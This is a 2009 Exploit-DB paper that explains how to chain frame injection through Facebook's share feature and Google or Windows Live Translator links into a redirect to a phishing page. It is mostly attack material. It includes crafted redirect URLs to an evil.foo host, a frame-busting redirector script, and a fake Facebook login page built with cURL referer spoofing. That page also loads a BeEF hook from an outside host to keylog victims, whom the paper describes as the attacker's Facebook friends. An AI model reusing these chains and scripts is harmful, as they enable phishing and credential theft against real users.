From Legal Frame Injection to Illegal Redirect

EDB-ID:

12962

CVE:

N/A


Author:

p3Lo

Type:

papers


Platform:

Multiple

Date:

2009-02-12


 *******************************************************************************
 *********************      p3Lo (thibaut.l) Presents      *********************
 ******************************************************************************* 
 *                                                                             * 
 *  **** ****   *****   ***   **        **    ****** *******  *****  **        * 
 *  **   *  ** **   ** **********       **    ****** *******  *   *  **        * 
 *  **   *  ** *     * **  **  **       **    **     *        *   *  **        * 
 *  ***  ****  *     * **  **  **       **    ****   *        *****  **        * 
 *  **   * **  *     * **  **  **       **    **     *  ****  *   *  **        *
 *  **   *  ** **   ** **      **       ***** ****** *     *  *   *  ******    *
 *  **   *  **  *****  **      **       ***** ****** ******* **   ** ******    *
 *                                                                             *
 *                                                                             *
 * **** ***    *   *     * *****    * *   * **** ****  *** ******  ***** **  * *
 * *    *  *  * *  **   ** *        * **  *   *  *    *      *   * *   * **  * *
 * *    *  * *   * * * * * *        * * * *   *  *    *      *   * *   * *** * *
 * ***  ***  ***** *  *  * ****     * * * *   *  ***  *      *   * *   * * * * *
 * *    * *  *   * *     * *        * * * * * *  *    *      *   * *   * * *** *
 * *    *  * *   * *     * *        * *  ** * *  *    *      *   * *   * *  ** *
 * *    *  * *   * *     * *****    * *  ** ***  ****  ***   *   * ***** *  ** *
 *                                                                             *
 *         ******** *****        ** *    *    **** ****  ***** *               *
 *            **    **  *        ** *    *    *    *     *   * *               *
 *            **    **  *        ** *    *    *    *     *   * *               *
 *            **    **  *        ** *    *    ***  * *** ***** *               *
 *            **    **  *        ** *    *    *    *  *  *   * *               *
 *            **    **  *        ** *    *    *    *  *  *   * *               *
 *            **    *****        ** **** **** **** ****  *   * *****           *
 *                                                                             *
 *      *******  ******  ****        ******  ******   *******  ********        *
 *      *     *  ******  ******  **  *    *  ******   **   **  ********        *
 *      *     *  *       **   *  **  *    *  *       **           **           *
 *      *******  *       **   *  **  ******  *****   **           **           *
 *      *******  ****    **   *  **  * **    *****   **           **           *
 *      *  **    *       **   *  **  *  **   *       **           **           *
 *      *   **   *       **   *  **  *   **  *       **           **           *
 *      *    **  ******  ******  **  *   **  ******   **    *     **          **
 **     *    **  ******  *****   **  *   **  ******   *******     **         ***
 ***                                                                        ****
 *****                                                                     *****
 *******************************************************************************
 *******************************************************************************
 **********                                                           ********** 
 ********                                                               ******** 
 ****                                                                       **** 
 *      *******   *****             ****     ****    ****   *******            *
 *      *******  *******           *****    ******  ******  *******            *
 *      *        **    *              **    *    *  *    *       **            *
 *      *******  *     *              **         *       *       **            *
 *            *  *     * *****        **      ****   *****    *******          *
 *            *  *     * *****        **      ****   *****    *******          *
 *            *  *     *              **         *       *       **            *
 *      *     *  *     *              **         *       *       **            *
 *      **   **  ***  **           *******  **  **  **  **       **            *
 *       *****    *****            *******  ******  ******       **            *
 *                                                                             *
 *                       ****  *****  ****** *       *                         *
 *                      **     *   *  *       *  *  *                          *
 *                      *      *****  *****   *  *  *                          *
 *                      *      * *    *        * * *                           *
 *                      *****  *  *   ******   ** **                           *
 *                                                                             *
 *                                                                             *
 *******************************************************************************
      
      
       !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!                              
       !  Author : p3Lo (Thibaut.L)                                  ! 
       !  CreW : 50-1337                                             !
       !  Subject : From "legal" frame injection to illegal redirects!
       !  Vulnerable platforms: all browsers with GUI                !
       !  Date : Thursday 12 February 2009                           !
       !  Target: facebook.com,windowslivetranslator.com,Google.com  ! 
       !  Mail: pelo[at]k[dot]st                                     !
       !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!	  



Disclamer:
----------

In this paper we will see how we can combine "legal" frame injection to succeed to a redirect vulnerability. This paper has been written for informational purpose, don't use it illegaly. I would be in no cases responsible of your acts further to the reading of this article.




0) Sum up:
---------

1) Introduction
2) Frame injection definition, explanation
3) Description of the targeted url used as payload 
4) Redirects a little description about the exploit
5) Way of exploitation, combining redirect with frame injection vulnz
6) Correct the vuln please !
7) Linkz and Greetz


Needed:
-A web server with cURL enabled
-Knowledge in php / js
-A facebook account and friends to test the exploit
-Beef (bindshell.net)
-Frame injections and eyes to read it. 
	

	
1) Introduction
---------------
	
	Day  after days the web vulnerabilities are subjected to a constant evolution due to the diversity of the web programming langages. Mostly the targets first touched are the social network and the search engines because of their huge visits by days. That's why these website are compelled of applying the principle of responsible disclosure in order to protect their customers and avoid the abuse. 

	
	  
	  
	  
2) Frame injection definition, explanation : 
--------------------------------------------

Definition:
  A frame injection attack (on the web) is an attack who works on all GUI based browsers , it consist in load arbitrary code such as Javascript, VBScript (activeX), flash , AJAX (html+js+py). This happens when code gets injected through frames due to scripts not validating their input. 
  
(extract from pagvac - gnucitizen)  
<< Frame injection vulnerabilities, although some people might consider them the same as HTML injection/XSS or even a subset, they really are not the same.

Here is why:
    * There is no need to inject special control characters such as angle brackets (unlike HTMLi/XSS)
    * HTMLi/XSS filtering routines will not project against frame injection since the attacker only needs to insert a URL in the non-sanitized parameter

The best way to explain what I mean is to show an example. Most frame injection issues occur in web applications because dynamic frameset/iframe insertion is not implemented with enough filtering. For instance, say that we have the following URL on the target site:

https://www.victim.foo/index.php?targeturl=/contact.php

A malicious user with intentions of launching a phishing attack will try tampering the targeturl parameter. His goal is to insert a third-party page that is under his control, rather than the original contact page. Indeed, index.php, although is not allowing HTML or JavaScript to be assigned to targeturl, is happy to process an absolute URL rather than a relative one:

https://www.victim.foo/index.php?targeturl=http://evil.foo/login.php   >>
 
Note : The attacker can encode the malicious pishing link to hex values, we didn't use that on this paper.




3) Description of the targeted url used as payload :
-------------------------------------------------------------------

This technique will work only if the victim contact has added you to his friend list and if the facebook session cookie is stored by your browser.The legal frame injection on facebook consist to input an url on the page named sharer.php.In facebook you can see if a contact is online or not when you accept him as friend or if his profile is public. A malicious attacker will try to add you to gain information about you. In facebook i advice you to dont allow every untrusted contact to add you because he can try to hack you account like sending to you a malicious link.

How this attack can work ?

Here is a little example of the code that facebook can use to protect the "legal" link injected on facebook.com/sharer.php  


                                                             
                                                                        
                       Enter the url that you want to share.            
                     /--------------------------------------\ /------\ 
                     |http://                               | |share |  
                     \--------------------------------------/ \------/  
                                                                        
                                                                        													

Using of google	or live search frame injection as payload to our attack:

 Now lets use our malicious brain to hijack this.
The "legal" frame injection that we used will be on a "trusted" website ,the victim has to trust the link sended by you on your profile thats why google or livesearch are welcome for this attack.

The source code of bypass.php is my malicious redirector script, it will be explained later in the paper.

Google image frame injection
http://www.google.fr/imgres?imgurl=http://fake_url&imgrefurl=http://evil.foo/bypass.php

Or

Windows live translator frame injection
http://www.windowslivetranslator.com/BV.aspx?ref=Internal#http://www.windowslivetranslator.com/bv.aspx?mkt=fr-FR&dl=fr&lp=en_fr&a=http://evil.foo/bypass.php




4) Redirect the little description :
-----------------------------------

The redirect vulnerability allows an evil-minded user of redirecting a victim towards a site which is aimed at harming the users. The principal attack vector of this vulnerability is the pishing. The redirect vulnerability can be associated with a malicious script written in php, javascript, vbscript ,ajax (worm) only with remote web server privileges.

The most common attack vector is manifested by the presence of a double url in the attack:
http://site.com/redirect?r=http://malicious_website.com

I invite you to see the facebook redirect exploit video on my website (p3lo.lescigales.org/wp/).
 
See the example picture:



 
 
5) Way of exploitation, combining redirect with frame injection vulnz:
----------------------------------------------------------------------

Example of advanced redirect and frame injection combo attack:                                             
                                                                              
 /-----------/  /-----------/  /-----------/   /-----------/  /-----------/   
 |facebook   ---| google    ---| bypass.php|---| login.php ---| b e e f  :    
 \-----------\  \-----------\  \-----------\   \-----------\  \-----------\                   


The facebook sharer.php input source might looks like this script: 


#########################################################################
<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN" 
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 
<html xmlns="http://www.w3.org/1999/xhtml"> 
<html> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
<title> Welcome in my-site-is-not-secure-now.w00t</title> 
</head> 
<frameset rows="*" cols="110,*" frameborder="NO" border="0" framespacing="0"> 
  <frame src="navigation.htm" name="navigation" frameborder="yes" scrolling=""NO" 
bordercolor="#0000CC" id="navigation"> 
  <frameset rows="98,*" cols="*" framespacing="0" frameborder="NO" border="0" > 
    <frame src="en_tete.htm" name="en-tete" frameborder="yes" scrolling="NO" 
bordercolor="#000000" id="en-tete"> 
    <frame  src="<?php 
  //secure code 
  if(isset($_GET['iframe'])) 
      { 
$allowUrls = array("http://www.google.fr/imgres?imgurl=http://fake_url&imgrefurl=http://evil.foo/bypass.php");  
//^^^^^^^^^^^^sharer.php allowed links here 
   
        if(in_array($_GET['iframe'], $allowUrls)) 
        echo $_GET['iframe']; //if iframe have an url allowed 
        else // for show the main page (or an error page) 
        echo "accueil.htm"; 
  } 
  else // !!! 
    echo "accueil.htm"; 
?>" name="corps" scrolling="auto" id="corps"> 
  </frameset> 
</frameset><noframes>No frames :(</noframes> 
</html> 
#########################################################################



The facebook change the malicious url to a clean link like (the 501337 Crew p3lo are the generated values, letters and numbers by the sharer.php script): 

http://www.facebook.com/ext/share.php?sid=501337&h=Crew&u=p3lo


And the link on the facebook profile appeared like this:

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& 
Results of image search
 
http://www.google.fr/imgres?imgurl=http://fake_url... 
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&



Now lets look around the PoC of my redirector script (bypass.php):
###########################################################################
 <head>                                                                                            
                                                                                                   
 <meta http-equiv="Content-Language" content="it">                                                 
 <SCRIPT LANGUAGE="JavaScript">                                                                    
 if (top.frames.length!=0) top.location=self.document.location;                                    
 </SCRIPT>                                                                                         
 <title>fb redirector PoC by p3lo</title>                                                          
                                                                                                   
 </head>                                                                                           
                                                                                                   
                                                                                                   
                                                                                                   
 <body bgcolor="#99FF66">                                                                          
                                                                                                   
The first script contained in the head permit to kill the first frame of my payload url redirecting it to self.document.location .
The second script permit to redirect my page to an advanced pishing page (keylogged with beef bindshell.net) 
 
 .p3lo                                                                                             
                                                                                                   
 <br>                                                                                              
                                                                                                   
 <br><br>                                                                                          
                                                                                                   
 </body>                                                                                           
                                                                                                   
 <br><br><script>document.location="http://evil.foo/login.php";</script><br>    
###############################################################################                                                       
 
This is the source of the advanced redirect pishing page (login.php):

############################################################################### 
<?php
//by p3lo
//this is how to send a get request with cURL (your server have to be cURL enabled)

//spoofing referer
$referer=”http://www.facebook.com/”;
// spoofing FireFox 2.0
$useragent=”Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1?;
$ch = curl_init();

curl_setopt ($ch, CURLOPT_URL, "http://www.facebook.com/");
curl_setopt ($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_REFERER, $referer);

curl_exec ($ch);

curl_close ($ch);
?>
<script src=”http://beefsite/beef/hook/beefmagic.js.php”></script>   // <——-beef on my scampage page
############################################################################### 





6) Correct the vuln please :
----------------------------

After a long moment of research, i think that the best way to correct these vulnerabilities is to assure the user that he leave the page and the website domain. A redirection page to ensure his choice is the best way to warn the user of the possibles threats against him.
I hope you have taken pleasure to read my whitepaper.




7) Linkz and Greetz :
---------------------

Links concerning this article:
- http://p3lo.lescigales.org/wp
- http://www.gnucitizen.org/blog/frame-injection-fun/
- http://bindshell.net/


Greetz
Str0ke . Mike001 . Devil . Noxo . MySt3ri0us . xxello . t0fx . AzOTe . Funny . scarface-team . Xylitol . Z3Q3ul . asylu3 . 0ni . KPCR . Sh0ck . Nasty Shade . TheCrow . HuG . Hug88 . Ez3kiEl . tr00ps . £lectricdr3ke . stivon . Faworis . emuleman . RF . White Angels . Miss Narkotik . p@@@ . Akxos/Freiya . Odysse . Tavux . v00d00chile . mrabah12 . Big.E . Benjilen00b .SoLiTaIr3 

CreWz : 50-1337 CreW . CWH Underground . Scarface Team . Team Sakage . 
Special Tapz: Yehouda,dimtokill,blueninja,nico,snoop,trika,sakage team,ooyep,freeman  
Sites: p3lo.lescigales.org/wp/,forum.europasecurity.org,citec.us,xssed.org,Zataz.com     

# milw0rm.com [2009-02-12]